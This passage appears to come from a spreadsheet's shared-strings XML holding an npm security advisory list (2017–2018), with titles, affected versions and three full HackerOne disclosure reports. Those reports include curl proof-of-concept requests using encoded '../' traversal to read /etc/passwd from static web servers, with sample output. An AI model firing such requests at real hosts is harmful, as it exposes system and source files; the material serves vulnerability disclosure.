    <t>2018-01-23T16:42:58.027+00:00</t>
  </si>
  <si>
    <t>yjmyjmyjm</t>
  </si>
  <si>
    <t>https://www.npmjs.com/yjmyjmyjm</t>
  </si>
  <si>
    <t>&lt;=99.999.9999</t>
  </si>
  <si>
    <t>[lactate] Static Web Server Directory Traversal via Crafted GET Request</t>
  </si>
  <si>
    <t>/advisories/560</t>
  </si>
  <si>
    <t>2018-01-23T16:40:27.5+00:00</t>
  </si>
  <si>
    <t>lactate</t>
  </si>
  <si>
    <t>https://www.npmjs.com/lactate</t>
  </si>
  <si>
    <t>https://hackerone.com/reports/296645.json</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Hi &lt;a href="/vdeturckheim"&gt;@vdeturckheim&lt;/a&gt;,&lt;/p&gt;
&lt;p&gt;A crafted GET request can be leveraged to traverse the directory structure of a host using the &lt;code&gt;lactate&lt;/code&gt; web server package, and request arbitrary files outside of the specified web root.&lt;/p&gt;
&lt;h2 id="module-specification"&gt;Module specification&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Name&lt;/strong&gt;: &lt;a href="/redirect?signature=0aff6925d06b494030b79bdb45e67d00c5b8b47e&amp;amp;url=https%3A%2F%2Fwww.npmjs.com%2Fpackage%2Flactate" target="_blank" rel="nofollow noopener noreferrer"&gt;&lt;span&gt;lactate&lt;/span&gt;&lt;i class="icon-external-link"&gt;&lt;/i&gt;&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Version&lt;/strong&gt;: 0.13.12 (latest release build)&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="verified-conditions"&gt;Verified conditions&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Test server:&lt;/strong&gt; Ubuntu 16.04 LTS&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;cURL package&lt;/strong&gt;: &lt;code&gt;curl 7.55.1 (2017-08-14)&lt;/code&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;I have not presently attempted to contact the maintainer and would appreciate assistance from Node.js Security in doing so, as described in the Disclosure Guidelines. This package has a considerably larger download count than those previously reported.&lt;/p&gt;
&lt;h2 id="proof-of-concept"&gt;Proof of concept&lt;/h2&gt;
&lt;p&gt;Please globally install the &lt;code&gt;lactate&lt;/code&gt; package and &lt;code&gt;cd&lt;/code&gt; to a chosen directory (in this case, &lt;code&gt;/root&lt;/code&gt;) on your test server. Next, run &lt;code&gt;lactate  -p 8081&lt;/code&gt; to start serving from this location.&lt;/p&gt;
&lt;p&gt;Substituting the &lt;code&gt;&amp;lt;server-IP&amp;gt;&lt;/code&gt; value as appropriate, the following cURL request can be used to demonstrate this vulnerability by requesting the target &lt;code&gt;/etc/passwd&lt;/code&gt; file:&lt;/p&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;curl &amp;quot;http://&amp;lt;server-IP&amp;gt;:8081/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd&amp;quot;
&lt;/code&gt;&lt;/pre&gt;&lt;pre class="highlight plaintext"&gt;&lt;code&gt;root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
[...]
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Thanks,&lt;/p&gt;
&lt;p&gt;Yasin&lt;/p&gt;
&lt;h2 id="impact"&gt;Impact&lt;/h2&gt;
&lt;p&gt;An adversary can leverage this vulnerability to request arbitrary files from the target host, which may include application source code or system configuration data.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>2017-12-10T08:22:40.195Z</t>
  </si>
  <si>
    <t>2018-01-23T09:53:02.015Z</t>
  </si>
  <si>
    <t>An adversary can leverage this vulnerability to request arbitrary files from the target host, which may include application source code or system configuration data.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi @vdeturckheim,  crafted request leveraged traverse directory structure host using lactate web server package, request arbitrary files outside specified web root.  Module specification    Name  lactate   Version  0.13.12 (latest release build)   Verified conditions    Test server  Ubuntu 16.04 LTS  cURL package  curl 7.55.1 (2017 08 14)    not presently attempted contact maintainer appreciate assistance Security doing so, described Disclosure Guidelines. package considerably larger download count previously reported.  Proof concept  Please globally install lactate package cd chosen directory (in case, /root) test server. Next, run lactate   p 8081 start serving location.  Substituting  value appropriate, following cURL request used demonstrate vulnerability requesting target /etc/passwd file  curl Â« Â»http // 8081/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwdÂ« Â» root x 0 0 root /root /bin/bash daemon x 1 1 daemon /usr/sbin /usr/sbin/nologin bin x 2 2 bin /bin /usr/sbin/nologin sys x 3 3 sys /dev /usr/sbin/nologin [...]  Thanks,  Yasin  Impact  adversary leverage vulnerability request arbitrary files target host, may include application source code system configuration data. </t>
  </si>
  <si>
    <t>adversary leverage vulnerability request arbitrary files target host, may include application source code system configuration data.</t>
  </si>
  <si>
    <t>[augustine] Static Web Server Directory Traversal via Crafted GET Request</t>
  </si>
  <si>
    <t>/advisories/559</t>
  </si>
  <si>
    <t>2018-01-23T16:29:48.657+00:00</t>
  </si>
  <si>
    <t>augustine</t>
  </si>
  <si>
    <t>https://www.npmjs.com/augustine</t>
  </si>
  <si>
    <t>https://hackerone.com/reports/296282.json</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Hi,&lt;/p&gt;
&lt;p&gt;A crafted GET request can be leveraged to traverse the directory structure of a host using the &lt;code&gt;augustine&lt;/code&gt; web server package, and request arbitrary files outside of the specified web root.&lt;/p&gt;
&lt;h2 id="module-specification"&gt;Module specification&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Name&lt;/strong&gt;: &lt;a href="/redirect?signature=d3881af6d9d01f951f74f1343f8ac770cd0c1c11&amp;amp;url=https%3A%2F%2Fwww.npmjs.com%2Fpackage%2Faugustine" target="_blank" rel="nofollow noopener noreferrer"&gt;&lt;span&gt;augustine&lt;/span&gt;&lt;i class="icon-external-link"&gt;&lt;/i&gt;&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Version&lt;/strong&gt;: 0.2.3 (latest release build)&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="verified-conditions"&gt;Verified conditions&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Test server:&lt;/strong&gt; Ubuntu 16.04 LTS&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;cURL package&lt;/strong&gt;: &lt;code&gt;curl 7.55.1 (2017-08-14)&lt;/code&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="proof-of-concept"&gt;Proof of concept&lt;/h2&gt;
&lt;p&gt;Please globally install the &lt;code&gt;augustine&lt;/code&gt; package and &lt;code&gt;cd&lt;/code&gt; to a chosen directory (in this case, &lt;code&gt;/root&lt;/code&gt;) on your test server. Next, run &lt;code&gt;augustine --port 8081&lt;/code&gt; to start serving from this location.&lt;/p&gt;
&lt;p&gt;Substituting the &lt;code&gt;&amp;lt;server-IP&amp;gt;&lt;/code&gt; value as appropriate, the following cURL request can be used to demonstrate this vulnerability by requesting the target &lt;code&gt;/etc/passwd&lt;/code&gt; file. Due to the nature of this traversal, browsing to the below URL will also display the &lt;code&gt;passwd&lt;/code&gt; file:&lt;/p&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;curl &amp;quot;http://&amp;lt;server-IP&amp;gt;:8081//etc/passwd&amp;quot;
&lt;/code&gt;&lt;/pre&gt;&lt;pre class="highlight plaintext"&gt;&lt;code&gt;root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
[...]
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Thanks,&lt;/p&gt;
&lt;p&gt;Yasin&lt;/p&gt;
&lt;h2 id="impact"&gt;Impact&lt;/h2&gt;
&lt;p&gt;An adversary can leverage this vulnerability to request arbitrary files from the target host, which may include application source code or system files.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>2017-12-08T14:35:46.647Z</t>
  </si>
  <si>
    <t>2018-01-23T09:53:11.566Z</t>
  </si>
  <si>
    <t>An adversary can leverage this vulnerability to request arbitrary files from the target host, which may include application source code or system files.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,  crafted request leveraged traverse directory structure host using augustine web server package, request arbitrary files outside specified web root.  Module specification    Name  augustine   Version  0.2.3 (latest release build)   Verified conditions    Test server  Ubuntu 16.04 LTS  cURL package  curl 7.55.1 (2017 08 14)    Proof concept  Please globally install augustine package cd chosen directory (in case, /root) test server. Next, run augustine   port 8081 start serving location.  Substituting  value appropriate, following cURL request used demonstrate vulnerability requesting target /etc/passwd file. Due nature traversal, browsing below URL will display passwd file  curl Â« Â»http // 8081//etc/passwdÂ« Â» root x 0 0 root /root /bin/bash daemon x 1 1 daemon /usr/sbin /usr/sbin/nologin bin x 2 2 bin /bin /usr/sbin/nologin sys x 3 3 sys /dev /usr/sbin/nologin [...]  Thanks,  Yasin  Impact  adversary leverage vulnerability request arbitrary files target host, may include application source code system files. </t>
  </si>
  <si>
    <t>adversary leverage vulnerability request arbitrary files target host, may include application source code system files.</t>
  </si>
  <si>
    <t>Arbitrary Code Injection</t>
  </si>
  <si>
    <t>/advisories/317</t>
  </si>
  <si>
    <t>2018-01-15T18:13:27.024+00:00</t>
  </si>
  <si>
    <t>mobile-icon-resizer</t>
  </si>
  <si>
    <t>https://www.npmjs.com/mobile-icon-resizer</t>
  </si>
  <si>
    <t>&gt;=0.2.0 &lt;=0.4.2</t>
  </si>
  <si>
    <t>&gt;=0.4.3</t>
  </si>
  <si>
    <t>/advisories/555</t>
  </si>
  <si>
    <t>2018-01-15T18:11:39.891+00:00</t>
  </si>
  <si>
    <t>mqtt</t>
  </si>
  <si>
    <t>https://www.npmjs.com/mqtt</t>
  </si>
  <si>
    <t>&gt;=2.0.0 &lt;=2.14.0</t>
  </si>
  <si>
    <t>&gt;=2.15.0</t>
  </si>
  <si>
    <t>/advisories/556</t>
  </si>
  <si>
    <t>2018-01-15T18:08:24.248+00:00</t>
  </si>
  <si>
    <t>featurebook</t>
  </si>
  <si>
    <t>https://www.npmjs.com/featurebook</t>
  </si>
  <si>
    <t>&lt;=0.0.32</t>
  </si>
  <si>
    <t>Identity Spoofing</t>
  </si>
  <si>
    <t>/advisories/558</t>
  </si>
  <si>
    <t>2018-01-15T17:07:03.984+00:00</t>
  </si>
  <si>
    <t>libp2p-secio</t>
  </si>
  <si>
    <t>https://www.npmjs.com/libp2p-secio</t>
  </si>
  <si>
    <t>&lt;=0.8.1</t>
  </si>
  <si>
    <t>&gt;0.8.1</t>
  </si>
  <si>
    <t>[serve-here] Static Web Server Directory Traversal via Crafted GET Request</t>
  </si>
  <si>
    <t>/advisories/557</t>
  </si>
  <si>
    <t>2018-01-15T04:52:05.294+00:00</t>
  </si>
  <si>
    <t>@vivaxy/here</t>
  </si>
  <si>
    <t>https://www.npmjs.com/@vivaxy/here</t>
  </si>
  <si>
    <t>&lt;=3.2.1</t>
  </si>
  <si>
    <t>&gt;=3.2.2</t>
  </si>
  <si>
    <t>https://hackerone.com/reports/296254.json</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Hi,&lt;/p&gt;
&lt;p&gt;A crafted GET request can be leveraged to traverse the directory structure of a host using the &lt;code&gt;serve-here&lt;/code&gt; web server package, and request arbitrary files outside of the specified web root.&lt;/p&gt;
&lt;h2 id="module-specification"&gt;Module specification&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Name&lt;/strong&gt;: &lt;a href="/redirect?signature=40cde03c29d06a714b341d197c0b603129c348a3&amp;amp;url=https%3A%2F%2Fwww.npmjs.com%2Fpackage%2Fserve-here" target="_blank" rel="nofollow noopener noreferrer"&gt;&lt;span&gt;serve-here&lt;/span&gt;&lt;i class="icon-external-link"&gt;&lt;/i&gt;&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Version&lt;/strong&gt;: 3.2.0 (latest release build)&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="verified-conditions"&gt;Verified conditions&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Test server:&lt;/strong&gt; Ubuntu 16.04 LTS&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;cURL package&lt;/strong&gt;: &lt;code&gt;curl 7.55.1 (2017-08-14)&lt;/code&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="proof-of-concept"&gt;Proof of concept&lt;/h2&gt;
&lt;p&gt;Please install the &lt;code&gt;serve-here&lt;/code&gt; package and &lt;code&gt;cd&lt;/code&gt; to a chosen directory (in this case, &lt;code&gt;/root&lt;/code&gt;) on your test server. Next, run &lt;code&gt;here -p 8081&lt;/code&gt; to start serving from this location.&lt;/p&gt;
&lt;p&gt;Substituting the &lt;code&gt;&amp;lt;server-IP&amp;gt;&lt;/code&gt; value as appropriate, the following cURL request can be used to demonstrate this vulnerability by requesting the target &lt;code&gt;/etc/passwd&lt;/code&gt; file:&lt;/p&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;curl &amp;quot;http://&amp;lt;server-IP&amp;gt;:8081/..%2f..%2fetc/passwd&amp;quot;
&lt;/code&gt;&lt;/pre&gt;&lt;pre class="highlight plaintext"&gt;&lt;code&gt;root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
[...]
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Thanks,&lt;/p&gt;
&lt;p&gt;Yasin&lt;/p&gt;
&lt;h2 id="impact"&gt;Impact&lt;/h2&gt;
&lt;p&gt;An adversary can leverage this vulnerability to request arbitrary files from the target host, which may include application source code or system files.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>2017-12-08T12:44:55.679Z</t>
  </si>
  <si>
    <t>2018-01-10T20:41:50.119Z</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,  crafted request leveraged traverse directory structure host using serve web server package, request arbitrary files outside specified web root.  Module specification    Name  serve   Version  3.2.0 (latest release build)   Verified conditions    Test server  Ubuntu 16.04 LTS  cURL package  curl 7.55.1 (2017 08 14)    Proof concept  Please install serve package cd chosen directory (in case, /root) test server. Next, run  p 8081 start serving location.  Substituting  value appropriate, following cURL request used demonstrate vulnerability requesting target /etc/passwd file  curl Â« Â»http // 8081/..%2f..%2fetc/passwdÂ« Â» root x 0 0 root /root /bin/bash daemon x 1 1 daemon /usr/sbin /usr/sbin/nologin bin x 2 2 bin /bin /usr/sbin/nologin sys x 3 3 sys /dev /usr/sbin/nologin [...]  Thanks,  Yasin  Impact  adversary leverage vulnerability request arbitrary files target host, may include application source code system files. </t>
  </si>
  <si>
    <t>/advisories/554</t>
  </si>
  <si>
    <t>2018-01-12T00:03:03.5+00:00</t>
  </si>
  <si>
    <t>serve-here</t>
  </si>
  <si>
    <t>https://www.npmjs.com/serve-here</t>
  </si>
  <si>
    <t>/advisories/553</t>
  </si>
  <si>
    <t>2017-12-13T21:56:27.632+00:00</t>
  </si>
  <si>
    <t>ecstatic</t>
  </si>
  <si>
    <t>https://www.npmjs.com/ecstatic</t>
  </si>
  <si>
    <t>&lt; 2.0.0</t>
  </si>
  <si>
    <t>Arbitrary Code Execution</t>
  </si>
  <si>
    <t>/advisories/552</t>
  </si>
  <si>
    <t>2017-12-06T04:30:12.961+00:00</t>
  </si>
  <si>
    <t>mathjs</t>
  </si>
  <si>
    <t>https://www.npmjs.com/mathjs</t>
  </si>
  <si>
    <t>&lt;3.17.0</t>
  </si>
  <si>
    <t>&gt;=3.17.0</t>
  </si>
  <si>
    <t>/advisories/551</t>
  </si>
  <si>
    <t>2017-12-06T04:27:36.829+00:00</t>
  </si>
  <si>
    <t>/advisories/532</t>
  </si>
  <si>
    <t>2017-11-27T17:56:00.056+00:00</t>
  </si>
  <si>
    <t>moment</t>
  </si>
  <si>
    <t>https://www.npmjs.com/moment</t>
  </si>
  <si>
    <t>&lt;2.19.3</t>
  </si>
  <si>
    <t>&gt;=2.19.3</t>
  </si>
  <si>
    <t>/advisories/550</t>
  </si>
  <si>
    <t>2017-11-08T19:26:00.965+00:00</t>
  </si>
  <si>
    <t>ws</t>
  </si>
  <si>
    <t>https://www.npmjs.com/ws</t>
  </si>
  <si>
    <t>&lt;1.1.5 || &gt;=2.0.0 &lt;3.3.1</t>
  </si>
  <si>
    <t>&gt;= 1.1.5 &lt;2.0.0 || &gt;=3.3.1</t>
  </si>
  <si>
    <t>Silently Runs Cryptocoin Miner</t>
  </si>
  <si>
    <t>/advisories/549</t>
  </si>
  <si>
    <t>2017-10-25T02:52:40.985+00:00</t>
  </si>
  <si>
    <t>hooka-tools</t>
  </si>
  <si>
    <t>https://www.npmjs.com/hooka-tools</t>
  </si>
  <si>
    <t>/advisories/410</t>
  </si>
  <si>
    <t>2017-10-25T02:47:47.847+00:00</t>
  </si>
  <si>
    <t>nodeload-nmickuli</t>
  </si>
  <si>
    <t>https://www.npmjs.com/nodeload-nmickuli</t>
  </si>
  <si>
    <t>/advisories/409</t>
  </si>
  <si>
    <t>2017-10-25T02:47:34.196+00:00</t>
  </si>
  <si>
    <t>wenluhong1</t>
  </si>
  <si>
    <t>https://www.npmjs.com/wenluhong1</t>
  </si>
  <si>
    <t>/advisories/408</t>
  </si>
  <si>
    <t>2017-10-25T02:47:15.142+00:00</t>
  </si>
  <si>
    <t>city-weather-abe</t>
  </si>
  <si>
    <t>https://www.npmjs.com/city-weather-abe</t>
  </si>
  <si>
    <t>Sandbox Breakout / Arbitrary Code Execution</t>
  </si>
  <si>
    <t>/advisories/548</t>
  </si>
  <si>
    <t>2017-10-18T22:15:49.038+00:00</t>
  </si>
  <si>
    <t>static-eval</t>
  </si>
  <si>
    <t>https://www.npmjs.com/static-eval</t>
  </si>
  <si>
    <t>&lt;=1.1.1</t>
  </si>
  <si>
    <t>Github Token Leak</t>
  </si>
  <si>
    <t>/advisories/546</t>
  </si>
  <si>
    <t>2017-10-13T23:37:30.166+00:00</t>
  </si>
  <si>
    <t>aegir</t>
  </si>
  <si>
    <t>https://www.npmjs.com/aegir</t>
  </si>
  <si>
    <t>&gt;=12.0.0 &lt;= 12.0.7</t>
  </si>
  <si>
    <t>&gt;= 12.0.8</t>
  </si>
  <si>
    <t>Open Redirect</t>
  </si>
  <si>
    <t>/advisories/547</t>
  </si>
  <si>
    <t>2017-10-13T23:01:42.775+00:00</t>
  </si>
  <si>
    <t>st</t>
  </si>
  <si>
    <t>https://www.npmjs.com/st</t>
  </si>
  <si>
    <t>&lt;=1.2.1</t>
  </si>
  <si>
    <t>&gt;=1.2.2</t>
  </si>
  <si>
    <t>/advisories/446</t>
  </si>
  <si>
    <t>2017-10-10T22:19:19.774+00:00</t>
  </si>
  <si>
    <t>nodeaaaaa</t>
  </si>
  <si>
    <t>https://www.npmjs.com/nodeaaaaa</t>
  </si>
  <si>
    <t>/advisories/415</t>
  </si>
  <si>
    <t>2017-10-10T22:08:42.232+00:00</t>
  </si>
  <si>
    <t>elding</t>
  </si>
  <si>
    <t>https://www.npmjs.com/elding</t>
  </si>
  <si>
    <t>/advisories/416</t>
  </si>
  <si>
    <t>2017-10-10T22:08:21.177+00:00</t>
  </si>
  <si>
    <t>yzt</t>
  </si>
  <si>
    <t>https://www.npmjs.com/yzt</t>
  </si>
  <si>
    <t>/advisories/417</t>
  </si>
  <si>
    <t>2017-10-10T22:07:57.134+00:00</t>
  </si>
  <si>
    <t>wind-mvc</t>
  </si>
  <si>
    <t>https://www.npmjs.com/wind-mvc</t>
  </si>
  <si>
    <t>/advisories/441</t>
  </si>
  <si>
    <t>2017-10-10T22:01:18.501+00:00</t>
  </si>
  <si>
    <t>yttivy</t>
  </si>
  <si>
    <t>https://www.npmjs.com/yttivy</t>
  </si>
  <si>
    <t>/advisories/444</t>
  </si>
  <si>
    <t>2017-10-10T22:01:12.925+00:00</t>
  </si>
  <si>
    <t>dgard8.lab6</t>
  </si>
  <si>
    <t>https://www.npmjs.com/dgard8.lab6</t>
  </si>
  <si>
    <t>/advisories/449</t>
  </si>
  <si>
    <t>2017-10-10T22:00:25.842+00:00</t>
  </si>
  <si>
    <t>fbr-client</t>
  </si>
  <si>
    <t>https://www.npmjs.com/fbr-client</t>
  </si>
  <si>
    <t>/advisories/418</t>
  </si>
  <si>
    <t>2017-10-09T21:07:37.27+00:00</t>
  </si>
  <si>
    <t>tencent-server</t>
  </si>
  <si>
    <t>https://www.npmjs.com/tencent-server</t>
  </si>
  <si>
    <t>/advisories/419</t>
  </si>
  <si>
    <t>2017-10-09T21:07:31.285+00:00</t>
  </si>
  <si>
    <t>sgqserve</t>
  </si>
  <si>
    <t>https://www.npmjs.com/sgqserve</t>
  </si>
  <si>
    <t>/advisories/420</t>
  </si>
  <si>
    <t>2017-10-09T21:07:24.161+00:00</t>
  </si>
  <si>
    <t>peiserver</t>
  </si>
  <si>
    <t>https://www.npmjs.com/peiserver</t>
  </si>
  <si>
    <t>/advisories/421</t>
  </si>
  <si>
    <t>2017-10-09T21:07:18.015+00:00</t>
  </si>
  <si>
    <t>mfrserver</t>
  </si>
  <si>
    <t>https://www.npmjs.com/mfrserver</t>
  </si>
  <si>
    <t>/advisories/422</t>
  </si>
  <si>
    <t>2017-10-09T21:07:10.857+00:00</t>
  </si>
  <si>
    <t>ltt</t>
  </si>
  <si>
    <t>https://www.npmjs.com/ltt</t>
  </si>
  <si>
    <t>/advisories/423</t>
  </si>
  <si>
    <t>2017-10-09T21:07:02.727+00:00</t>
  </si>
  <si>
    <t>lessindex</t>
  </si>
  <si>
    <t>https://www.npmjs.com/lessindex</t>
  </si>
  <si>
    <t>/advisories/424</t>
  </si>
  <si>
    <t>2017-10-09T21:06:54.186+00:00</t>
  </si>
  <si>
    <t>jn_jj_server</t>
  </si>
  <si>
    <t>https://www.npmjs.com/jn_jj_server</t>
  </si>
  <si>
    <t>/advisories/425</t>
  </si>
  <si>
    <t>2017-10-09T21:06:46.16+00:00</t>
  </si>
  <si>
    <t>enserver</t>
  </si>
  <si>
    <t>https://www.npmjs.com/enserver</t>
  </si>
  <si>
    <t>/advisories/426</t>
  </si>
  <si>
    <t>2017-10-09T21:06:38.535+00:00</t>
  </si>
  <si>
    <t>dmmcquay.lab6</t>
  </si>
  <si>
    <t>https://www.npmjs.com/dmmcquay.lab6</t>
  </si>
  <si>
    <t>Exfiltrates Discord login tokens to pastebin</t>
  </si>
  <si>
    <t>/advisories/545</t>
  </si>
  <si>
    <t>2017-10-09T16:59:58.947+00:00</t>
  </si>
  <si>
    <t>discordi.js</t>
  </si>
  <si>
    <t>https://www.npmjs.com/discordi.js</t>
  </si>
  <si>
    <t>Exfiltrates data on installation</t>
  </si>
  <si>
    <t>/advisories/540</t>
  </si>
  <si>
    <t>2017-10-06T06:55:27.158+00:00</t>
  </si>
  <si>
    <t>cofee-script</t>
  </si>
  <si>
    <t>https://www.npmjs.com/cofee-script</t>
  </si>
  <si>
    <t>1.0.1</t>
  </si>
  <si>
    <t>/advisories/542</t>
  </si>
  <si>
    <t>2017-10-06T06:55:16.817+00:00</t>
  </si>
  <si>
    <t>coffescript</t>
  </si>
  <si>
    <t>https://www.npmjs.com/coffescript</t>
  </si>
  <si>
    <t>/advisories/544</t>
  </si>
  <si>
    <t>2017-10-06T06:55:01.969+00:00</t>
  </si>
  <si>
    <t>jquey</t>
  </si>
  <si>
    <t>https://www.npmjs.com/jquey</t>
  </si>
  <si>
    <t>/advisories/543</t>
  </si>
  <si>
    <t>2017-10-06T06:54:52.137+00:00</t>
  </si>
  <si>
    <t>coffe-script</t>
  </si>
  <si>
    <t>https://www.npmjs.com/coffe-script</t>
  </si>
  <si>
    <t>/advisories/541</t>
  </si>
  <si>
    <t>2017-10-06T06:54:38.827+00:00</t>
  </si>
  <si>
    <t>cofeescript</t>
  </si>
  <si>
    <t>https://www.npmjs.com/cofeescript</t>
  </si>
  <si>
    <t>/advisories/427</t>
  </si>
  <si>
    <t>2017-10-04T21:01:15.583+00:00</t>
  </si>
  <si>
    <t>zjjserver</t>
  </si>
  <si>
    <t>https://www.npmjs.com/zjjserver</t>
  </si>
  <si>
    <t>/advisories/428</t>
  </si>
  <si>
    <t>2017-10-04T21:01:06.999+00:00</t>
  </si>
  <si>
    <t>uv-tj-demo</t>
  </si>
  <si>
    <t>https://www.npmjs.com/uv-tj-demo</t>
  </si>
  <si>
    <t>/advisories/429</t>
  </si>
  <si>
    <t>2017-10-04T21:00:56.554+00:00</t>
  </si>
  <si>
    <t>susu-sum</t>
  </si>
  <si>
    <t>https://www.npmjs.com/susu-sum</t>
  </si>
  <si>
    <t>/advisories/432</t>
  </si>
  <si>
    <t>2017-10-04T21:00:48.907+00:00</t>
  </si>
  <si>
    <t>ritp</t>
  </si>
  <si>
    <t>https://www.npmjs.com/ritp</t>
  </si>
  <si>
    <t>/advisories/434</t>
  </si>
  <si>
    <t>2017-10-04T21:00:42.167+00:00</t>
  </si>
  <si>
    <t>qinserve</t>
  </si>
  <si>
    <t>https://www.npmjs.com/qinserve</t>
  </si>
  <si>
    <t>/advisories/433</t>
  </si>
  <si>
    <t>2017-10-04T21:00:33.942+00:00</t>
  </si>
  <si>
    <t>quickserver</t>
  </si>
  <si>
    <t>https://www.npmjs.com/quickserver</t>
  </si>
  <si>
    <t>/advisories/435</t>
  </si>
  <si>
    <t>2017-10-04T21:00:26.545+00:00</t>
  </si>
  <si>
    <t>pytservce</t>
  </si>
  <si>
    <t>https://www.npmjs.com/pytservce</t>
  </si>
  <si>
    <t>/advisories/436</t>
  </si>
  <si>
    <t>2017-10-04T21:00:18.267+00:00</t>
  </si>
  <si>
    <t>picard</t>
  </si>
  <si>
    <t>https://www.npmjs.com/picard</t>
  </si>
  <si>
    <t>/advisories/437</t>
  </si>
  <si>
    <t>2017-10-04T21:00:07.626+00:00</t>
  </si>
  <si>
    <t>mfrs</t>
  </si>
  <si>
    <t>https://www.npmjs.com/mfrs</t>
  </si>
  <si>
    <t>/advisories/438</t>
  </si>
  <si>
    <t>2017-10-04T20:59:58.946+00:00</t>
  </si>
  <si>
    <t>getcityapi.yoehoehne</t>
  </si>
  <si>
    <t>https://www.npmjs.com/getcityapi.yoehoehne</t>
  </si>
  <si>
    <t>/advisories/440</t>
  </si>
  <si>
    <t>2017-10-04T00:23:00.133+00:00</t>
  </si>
  <si>
    <t>cypserver</t>
  </si>
  <si>
    <t>https://www.npmjs.com/cypserver</t>
  </si>
  <si>
    <t>/advisories/439</t>
  </si>
  <si>
    <t>2017-10-04T00:22:51.35+00:00</t>
  </si>
  <si>
    <t>dcdcdcdcdc</t>
  </si>
  <si>
    <t>https://www.npmjs.com/dcdcdcdcdc</t>
  </si>
  <si>
    <t>/advisories/442</t>
  </si>
  <si>
    <t>2017-10-04T00:18:33.426+00:00</t>
  </si>
  <si>
    <t>sly07</t>
  </si>
  <si>
    <t>https://www.npmjs.com/sly07</t>
  </si>
  <si>
    <t>/advisories/443</t>
  </si>
  <si>
    <t>2017-10-04T00:18:23.118+00:00</t>
  </si>
  <si>
    <t>reecerver</t>
  </si>
  <si>
    <t>https://www.npmjs.com/reecerver</t>
  </si>
  <si>
    <t>/advisories/447</t>
  </si>
  <si>
    <t>2017-10-04T00:18:08.552+00:00</t>
  </si>
  <si>
    <t>open-device</t>
  </si>
  <si>
    <t>https://www.npmjs.com/open-device</t>
  </si>
  <si>
    <t>/advisories/448</t>
  </si>
  <si>
    <t>2017-10-04T00:17:59.847+00:00</t>
  </si>
  <si>
    <t>360class.jansenhm</t>
  </si>
  <si>
    <t>https://www.npmjs.com/360class.jansenhm</t>
  </si>
  <si>
    <t>/advisories/450</t>
  </si>
  <si>
    <t>2017-10-04T00:17:50.615+00:00</t>
  </si>
  <si>
    <t>uekw1511server</t>
  </si>
  <si>
    <t>https://www.npmjs.com/uekw1511server</t>
  </si>
  <si>
    <t>/advisories/453</t>
  </si>
  <si>
    <t>2017-10-04T00:17:39.383+00:00</t>
  </si>
  <si>
    <t>scott-blanch-weather-app</t>
  </si>
  <si>
    <t>https://www.npmjs.com/scott-blanch-weather-app</t>
  </si>
  <si>
    <t>/advisories/454</t>
  </si>
  <si>
    <t>2017-10-04T00:17:29.55+00:00</t>
  </si>
  <si>
    <t>iter-server</t>
  </si>
  <si>
    <t>https://www.npmjs.com/iter-server</t>
  </si>
  <si>
    <t>/advisories/455</t>
  </si>
  <si>
    <t>2017-10-04T00:17:20.595+00:00</t>
  </si>
  <si>
    <t>serverxxx</t>
  </si>
  <si>
    <t>https://www.npmjs.com/serverxxx</t>
  </si>
  <si>
    <t>/advisories/458</t>
  </si>
  <si>
    <t>2017-10-02T21:23:05.878+00:00</t>
  </si>
  <si>
    <t>wintiwebdev</t>
  </si>
  <si>
    <t>https://www.npmjs.com/wintiwebdev</t>
  </si>
  <si>
    <t>/advisories/459</t>
  </si>
  <si>
    <t>2017-10-02T21:22:54.601+00:00</t>
  </si>
  <si>
    <t>serverabc</t>
  </si>
  <si>
    <t>https://www.npmjs.com/serverabc</t>
  </si>
  <si>
    <t>/advisories/460</t>
  </si>
  <si>
    <t>2017-10-02T21:22:40.78+00:00</t>
  </si>
  <si>
    <t>dasafio</t>
  </si>
  <si>
